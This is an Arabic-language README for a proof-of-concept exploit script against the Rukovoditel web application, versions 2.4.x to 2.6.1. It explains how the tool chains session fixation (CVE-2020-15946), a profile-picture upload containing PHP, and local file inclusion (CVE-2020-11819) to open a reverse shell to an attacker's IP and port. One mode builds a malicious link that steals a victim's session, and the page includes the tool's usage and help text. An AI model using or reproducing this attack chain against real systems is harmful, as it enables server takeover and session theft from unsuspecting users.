
إثبات المفهوم لـ CVE-2020-11819 و CVE-2020-15946
إثبات المفهوم لثغرات CVE-2020-11819 و CVE-2020-15946. تم اختباره على Rukovoditel 2.4.x و 2.5.x و 2.6.1
هذا الاستغلال له وضعان للتنفيذ، باستخدام ثغرة تثبيت الجلسة (CVE-2020-15946) أو باستخدام بيانات اعتماد الوصول لأي حساب تحت أي ملف تعريف. مع الخيار --type L، سيقوم هذا البرنامج النصي بإنشاء رابط ضار، إذا تم الوصول إلى الرابط عبر متصفح من قبل الضحية، سيتم تعيين معرف جلسة عشوائي سيُستخدم لسرقة جلستهم بعد تحميل صورة تحتوي على محتوى PHP في صورة ملفهم الشخصي، ثم استخدام تضمين الملف المحلي (CVE-2020-11819) للحصول على قوقعة عكسية جميلة، أو باستخدام الخيارات --type C -u -p يمكنك توفير بيانات اعتماد، تحميل الصورة بمحتوى PHP واستخدام تضمين الملف المحلي (CVE-2020-11819) لتحقيق تنفيذ الكود.
نصيحة محترف: تذكر التحقق من تفعيل وحدة التسجيل ;)
exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]
تنفيذ الكود عن بُعد بعد المصادقة لـ rukovoditel، إصدار البرنامج النصي 1.0
الوسائط الاختيارية:
-h, --help عرض رسالة المساعدة هذه والخروج
-t URL, --target URL المسار الكامل أو URL لنظام Rukovoditel http://url/path/to/cms/
-u USER, --user USER اسم المستخدم للمصادقة
-p PASSWORD, --password PASSWORD كلمة المرور للمصادقة
-a TYPE, --type TYPE استخدم -a L لإنشاء الرابط وسرقة الجلسة، أو استخدم -a C إذا كان لديك بيانات اعتماد الوصول لتطبيق الويب
--ip IP_ATTACKER عنوان IP للمهاجم للقوقعة العكسية!
--port PORT_ATTACKER المنفذ لاتصال القوقعة العكسية
--proxy PROXY تعيين وكيل HTTP للتصحيح http://127.0.0.1:8080